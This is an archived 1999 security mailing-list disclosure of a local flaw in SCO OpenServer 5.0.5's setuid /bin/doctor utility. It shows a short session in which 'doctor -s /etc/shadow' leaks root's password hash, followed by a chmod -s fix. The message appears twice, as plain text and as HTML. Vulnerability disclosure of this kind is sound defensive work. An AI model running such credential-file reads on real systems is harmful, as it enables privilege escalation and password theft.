SCO OpenServer 5.0.5 /bin/doctor root compromise

From: Brock Tellier (btellierat_private)
Date: Tue Sep 07 1999 - 08:44:42 PDT

Next message: Vincent Janelle: "Re: remote DoS against inetd and ssh"

Previous message: Stuart Harris: "Re: MW"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a multi-part message in MIME format.

------=_NextPart_000_017D_01BEF91D.FE5629A0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Greetings,


INFO:
 There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and =
probably others.  By supplying a doctor script file you can read the =
first partial line of any file on the system (good enough for =
/etc/shadow).  Example:

scobox:/bin$ id
uid=3D136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name =
"root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX:=20
 Just chmod -s until SCO comes out with a fix.  Although I certianly =
won't be changing it back to suid root anytime soon.  If a hole like =
this exists, there are undoubtedly countless more lurking within. =20

Brock Tellier
Systems Administrator
Webley Systems

------=_NextPart_000_017D_01BEF91D.FE5629A0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV>Greetings,</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>INFO:<BR>&nbsp;There is a local root comprimise in SCO 5.0.5's=20
/bin/doctor 2.0.0e2 and probably others.&nbsp; By supplying a doctor =
script file=20
you can read the first partial line of any file on the system (good =
enough for=20
/etc/shadow).&nbsp; Example:</DIV>
<DIV>&nbsp;</DIV>
<DIV>scobox:/bin$ id<BR>uid=3D136(btellier),200(users)<BR>scobox:/bin$ =
uname=20
-a<BR>SCO_SV scobox 3.2 5.0.5 i386<BR>scobox:/bin$ doctor -V<BR>doctor =
2.0.0e=20
2<BR>scobox:/bin$ doctor -s /etc/shadow<BR>doctor: WARNING User message: =
invalid=20
command name "root:xbfOLR0ekXN/o:10656::"<BR>scobox:/bin$</DIV>
<DIV>&nbsp;</DIV>
<DIV>And so on.</DIV>
<DIV>&nbsp;</DIV>
<DIV>FIX: <BR>&nbsp;Just chmod -s until SCO comes out with a fix.&nbsp; =
Although=20
I certianly won't be changing it back to suid root anytime soon.&nbsp; =
If a hole=20
like this exists, there are undoubtedly countless more lurking =
within.&nbsp;=20
</DIV>
<DIV>&nbsp;</DIV>
<DIV>Brock Tellier<BR>Systems Administrator<BR>Webley=20
Systems</DIV></BODY></HTML>

------=_NextPart_000_017D_01BEF91D.FE5629A0--

Next message: Vincent Janelle: "Re: remote DoS against inetd and ssh"
Previous message: Stuart Harris: "Re: MW"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:02:27 PDT